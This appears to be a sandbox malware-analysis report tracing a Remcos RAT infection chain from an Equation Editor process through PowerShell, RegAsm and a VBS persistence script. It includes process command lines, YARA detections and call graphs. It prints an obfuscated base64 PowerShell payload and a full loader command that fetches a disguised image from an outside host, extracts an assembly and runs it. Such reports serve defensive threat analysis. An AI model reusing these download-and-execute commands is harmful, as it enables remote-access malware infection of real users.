QBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreTQBSDgTreEgDgTreSDgTreDgTrevDgTreDgDgTreODgTreDgTrewDgTreDgDgTreMgDgTrevDgTreDYDgTreLgDgTrexDgTreDMDgTreLgDgTreyDgTreDcDgTreMQDgTreuDgTreDcDgTreMDgTreDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBhDgTreG4DgTredDgTreByDgTreGUDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                                                      Imagebase:0xec0000
                                                      File size:427'008 bytes
                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:14:55:25
                                                      Start date:01/05/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }"
                                                      Imagebase:0xec0000
                                                      File size:427'008 bytes
                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.492134092.00000000091E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:14:55:40
                                                      Start date:01/05/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs"
                                                      Imagebase:0x4a990000
                                                      File size:302'592 bytes
                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:14:55:45
                                                      Start date:01/05/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0xff0000
                                                      File size:64'704 bytes
                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.628166706.0000000000791000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:17
                                                      Start time:14:55:55
                                                      Start date:01/05/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\antre.vbs"
                                                      Imagebase:0xfffc0000
                                                      File size:168'960 bytes
                                                      MD5 hash:045451FA238A75305CC26AC982472367
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:23.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:54.7%
                                                        Total number of Nodes:53
                                                        Total number of Limit Nodes:8
                                                        execution_graph 306 35c03ff 307 35c0405 306->307 318 35c041b 307->318 319 35c0421 318->319 330 35c0442 319->330 331 35c0445 330->331 334 35c04a4 331->334 335 35c04a6 334->335 336 35c04b9 13 API calls 335->336 337 35c04ab 336->337 338 35c04c0 337->338 339 35c04d3 12 API calls 337->339 340 35c04e4 338->340 341 35c054a 12 API calls 338->341 339->338 341->340 258 35c04a4 259 35c04a6 258->259 266 35c04b9 LoadLibraryW 259->266 261 35c04ab 262 35c04c0 261->262 263 35c04d3 12 API calls 261->263 264 35c04e4 262->264 265 35c054a 12 API calls 262->265 263->262 265->264 271 35c04d3 266->271 272 35c04d6 271->272 274 35c04e4 272->274 275 35c054a URLDownloadToFileW 272->275 286 35c0563 275->286 277 35c0553 296 35c0578 277->296 279 35c056a 280 35c0572 ShellExecuteW 279->280 282 35c05d7 279->282 283 35c0591 280->283 303 35c059d 280->303 282->274 283->282 284 35c05a0 ExitProcess GetPEB 283->284 285 35c05b2 284->285 285->274 287 35c0565 286->287 288 35c056a 287->288 289 35c0578 5 API calls 287->289 290 35c0572 ShellExecuteW 288->290 292 35c05d7 288->292 289->288 291 35c059d 2 API calls 290->291 293 35c0591 290->293 291->293 292->277 293->292 294 35c05a0 ExitProcess GetPEB 293->294 295 35c05b2 294->295 295->277 297 35c057b ShellExecuteW 296->297 298 35c059d 2 API calls 297->298 299 35c0591 298->299 300 35c05d8 299->300 301 35c05a0 ExitProcess GetPEB 299->301 300->279 302 35c05b2 301->302 302->279 304 35c05a0 ExitProcess GetPEB 303->304 305 35c05b2 304->305 305->283

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_035C059D 10 Function_035C05CC 0->10 1 Function_035C061D 2 Function_035C03FF 2->1 6 Function_035C041B 2->6 9 Function_035C04D3 2->9 11 Function_035C054A 2->11 13 Function_035C04A4 2->13 3 Function_035C0578 3->0 3->10 4 Function_035C0258 5 Function_035C04B9 5->9 5->11 6->1 6->9 6->11 6->13 16 Function_035C0442 6->16 7 Function_035C0094 8 Function_035C01D6 9->11 11->0 11->3 11->10 19 Function_035C0563 11->19 12 Function_035C0024 13->5 13->9 13->11 14 Function_035C0000 15 Function_035C00E1 16->13 17 Function_035C03C3 18 Function_035C0383 19->0 19->3 19->10

                                                        Executed Functions

                                                        Function 035C054A Relevance: 4.5, APIs: 3, Instructions: 37filenetworkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 35c054a-35c0570 URLDownloadToFileW call 35c0563 call 35c0578 6 35c05d7-35c05e3 0->6 7 35c0572-35c058a ShellExecuteW 0->7 8 35c05e6 6->8 9 35c0591-35c0592 7->9 10 35c058c call 35c059d 7->10 11 35c05ee-35c05f2 8->11 12 35c05e8-35c05ec 8->12 13 35c05fd-35c0601 9->13 14 35c0594 9->14 10->9 17 35c05f4-35c05f8 11->17 18 35c0607-35c0609 11->18 12->11 16 35c05fa 12->16 19 35c0605 13->19 20 35c0603 13->20 14->8 15 35c0596 14->15 15->18 22 35c0598-35c05af ExitProcess GetPEB 15->22 16->13 17->16 17->18 21 35c0619-35c061a 18->21 19->18 23 35c060b-35c0614 19->23 20->18 30 35c05b2-35c05c3 call 35c05cc 22->30 26 35c05dd-35c05e0 23->26 27 35c0616 23->27 26->23 29 35c05e2 26->29 27->21 29->8 33 35c05c5-35c05c9 30->33
                                                        APIs
                                                        • URLDownloadToFileW.URLMON(00000000,035C04E4,?,00000000,00000000,?,035C0428,?,035C040C,?,035C03F2), ref: 035C054C
                                                          • Part of subcall function 035C0563: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001,?,035C0428,?,035C040C,?,035C03F2), ref: 035C058A
                                                          • Part of subcall function 035C0563: ExitProcess.KERNEL32(00000000,?,035C0591,?,035C0428,?,035C040C,?,035C03F2), ref: 035C05A2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.356926787.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: DownloadExecuteExitFileProcessShell
                                                        • String ID:
                                                        • API String ID: 3584569557-0
                                                        • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                        • Instruction ID: 17a0c12435f09bc646b32f550f3e27160b6a16623af650a2a83597ac040d2e69
                                                        • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                        • Instruction Fuzzy Hash: B6F0E9D45AC3C0EFEA11E7F4AC5EF6A5E287F81609F55048DB1514F0F3D994C9048625
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 035C0578 Relevance: 3.0, APIs: 2, Instructions: 50COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 34 35c0578-35c0592 ShellExecuteW call 35c059d 38 35c05fd-35c0601 34->38 39 35c0594 34->39 42 35c0605 38->42 43 35c0603 38->43 40 35c05e6 39->40 41 35c0596 39->41 47 35c05ee-35c05f2 40->47 48 35c05e8-35c05ec 40->48 44 35c0598-35c05af ExitProcess GetPEB 41->44 45 35c0607-35c0609 41->45 42->45 46 35c060b-35c0614 42->46 43->45 58 35c05b2-35c05c3 call 35c05cc 44->58 49 35c0619-35c061a 45->49 54 35c05dd-35c05e0 46->54 55 35c0616 46->55 47->45 53 35c05f4-35c05f8 47->53 48->47 52 35c05fa 48->52 52->38 53->45 53->52 54->46 57 35c05e2 54->57 55->49 57->40 61 35c05c5-35c05c9 58->61
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001,?,035C0428,?,035C040C,?,035C03F2), ref: 035C058A
                                                          • Part of subcall function 035C059D: ExitProcess.KERNEL32(00000000,?,035C0591,?,035C0428,?,035C040C,?,035C03F2), ref: 035C05A2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.356926787.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExecuteExitProcessShell
                                                        • String ID:
                                                        • API String ID: 1124553745-0
                                                        • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                        • Instruction ID: 31935c686bbd29ea3a2b2c1d424b34c0833b4a75fefbbe0736832c10d252e498
                                                        • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                        • Instruction Fuzzy Hash: 0C01FCD89B43C2DADF30EAE8E8057B79A15BB8170CFCC484E6482060F2C558D1C3C5AD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 035C0563 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 62 35c0563-35c0565 64 35c056a-35c0570 62->64 65 35c0565 call 35c0578 62->65 66 35c05d7-35c05e3 64->66 67 35c0572-35c058a ShellExecuteW 64->67 65->64 68 35c05e6 66->68 69 35c0591-35c0592 67->69 70 35c058c call 35c059d 67->70 71 35c05ee-35c05f2 68->71 72 35c05e8-35c05ec 68->72 73 35c05fd-35c0601 69->73 74 35c0594 69->74 70->69 77 35c05f4-35c05f8 71->77 78 35c0607-35c0609 71->78 72->71 76 35c05fa 72->76 79 35c0605 73->79 80 35c0603 73->80 74->68 75 35c0596 74->75 75->78 82 35c0598-35c05af ExitProcess GetPEB 75->82 76->73 77->76 77->78 81 35c0619-35c061a 78->81 79->78 83 35c060b-35c0614 79->83 80->78 90 35c05b2-35c05c3 call 35c05cc 82->90 86 35c05dd-35c05e0 83->86 87 35c0616 83->87 86->83 89 35c05e2 86->89 87->81 89->68 93 35c05c5-35c05c9 90->93
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.356926787.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExecuteExitProcessShell
                                                        • String ID:
                                                        • API String ID: 1124553745-0
                                                        • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                        • Instruction ID: 1b0442398455fafcea5991eea541727e4141752239473bd984aaa889ed0a2f04
                                                        • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                        • Instruction Fuzzy Hash: 53014C949B83C1EED620E6E4EC48BAAA950B7C170CF94440EA051070F2C284C5C3C15D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 035C04B9 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 94 35c04b9-35c04bb LoadLibraryW call 35c04d3 96 35c04c0-35c04c5 94->96 97 35c0535 96->97 98 35c04c7-35c0534 call 35c054a 96->98 100 35c0536-35c0544 97->100 98->97 98->100
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(035C04AB,?,035C0428,?,035C040C,?,035C03F2), ref: 035C04B9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.356926787.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 4836450b0cce7124105711d503be094eb3d73dd1ce2c3e5e680bc1076ba61889
                                                        • Instruction ID: 66cfcd8f5392b9c317d532e985eae8aff97ee2fd53533f14934d3765d3cbd145
                                                        • Opcode Fuzzy Hash: 4836450b0cce7124105711d503be094eb3d73dd1ce2c3e5e680bc1076ba61889
                                                        • Instruction Fuzzy Hash: 9F21CED684C7C25FC71387706D3E611BF642A67008B5D86CFD4C60A9E3E7989212D793
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 035C059D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 104 35c059d-35c05af ExitProcess GetPEB 106 35c05b2-35c05c3 call 35c05cc 104->106 109 35c05c5-35c05c9 106->109
                                                        APIs
                                                        • ExitProcess.KERNEL32(00000000,?,035C0591,?,035C0428,?,035C040C,?,035C03F2), ref: 035C05A2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.356926787.00000000035C0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_35c0000_EQNEDT32.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                                        • Instruction ID: 1f210fd44b163ef0e54a8dfdf15368c0c89f3aeedef8251ada056b9ccf7922e0
                                                        • Opcode Fuzzy Hash: e55ef30ae08b9a015fea4a6ff3e24b8599026409e8cd7a038f7e15e8fa1a622d
                                                        • Instruction Fuzzy Hash: 0CD017B1212642DFD204EB64DD80F27F77AFFC8621F14C268E5054B6AAC730E891CAE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        Function 0019D01D Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.544968912.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_19d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7c182e058e5ea8432d8b65bf0c6f0bd64bfcad85698e7d0aa14ff58db9fc83aa
                                                        • Instruction ID: 9046aba9fee548deda03ea74c90330a253c9303eb41b5a0d1c87c7bf96c6b285
                                                        • Opcode Fuzzy Hash: 7c182e058e5ea8432d8b65bf0c6f0bd64bfcad85698e7d0aa14ff58db9fc83aa
                                                        • Instruction Fuzzy Hash: 86018471504340AAEB105E25EC84B66BFD8EF41724F2C855AFC494B286C7799845C6B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0019D01C Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.544968912.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_19d000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7567bc44253df3c37ef2c6a3dcc30725b1d0073b655278a7356f1557e09f62f9
                                                        • Instruction ID: 10b9f03be4f507ad20b6f7a2af51832d84f789c51ecd2a12139e41022f7ce0d3
                                                        • Opcode Fuzzy Hash: 7567bc44253df3c37ef2c6a3dcc30725b1d0073b655278a7356f1557e09f62f9
